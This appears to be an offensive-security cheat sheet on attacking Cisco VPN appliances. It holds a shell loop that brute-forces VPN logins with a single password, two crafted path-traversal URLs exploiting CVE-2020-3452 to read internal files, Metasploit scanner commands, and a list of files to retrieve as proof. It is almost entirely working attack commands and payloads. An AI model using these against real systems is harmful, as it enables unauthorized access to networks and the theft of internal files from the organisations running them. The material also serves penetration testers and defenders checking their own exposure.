Cisco

Brute Force Authentication

Manually in a dirty way:

$ for user in `cat users.txt`; do echo 'Passw0rd!' | sudo openconnect vpn.contoso.com --user=$user --passwd-on-stdin --servercert=pin-sha256:<BASE64> | tee -a openconnect.log; done

ASA Path Traversal

CVE-2020-3452

Check manually:

https://cisco.example.com/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
https://cisco.example.com/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

Check with MSF:

msf > use auxiliary/scanner/http/cisco_directory_traversal
msf > set RHOSTS file:cisco.txt
msf > run

Potentially existent files to prove the vulnerability:

apcf
app_index.html
appstart.js
appstatus
ask.html
auth.html
blank.html
ced.html
cedf.html
cedhelp.html
cedlogon.html
cedmain.html
cedportal.html
cedsave.html
clear_cache
color_picker.html
color_picker.js
common.js
commonspawn.js
connection_failed_form
cookie
custom
do_url
files
gp-gip.html
help
home
http_auth.html
include
lced.html
localization_inc.lua
logo.gif
logon.html
logon_custom.css
logon_forms.js
logon_redirect.html
logout.html
no_svc.html
noportal.html
nostcaccess.html
ping.html
pluginlib.js
portal.css
portal.html
portal.js
portal_ce.html
portal_custom.css
portal_elements.html
portal_forms.js
portal_img
portal_inc.lua
preview.html
relayjar.html
relaymonjar.html
relaymonocx.html
relayocx.html
sdesktop
sess_update.html
session.js
session_expired
session_password.html
shshim
svc.html
test_chargen
tlbr
tunnel_linux.jnlp
tunnel_mac.jnlp
ucte_forbidden_data
ucte_forbidden_url
user_dialog.html
useralert.html
win.js
wrong_url.html

Last updated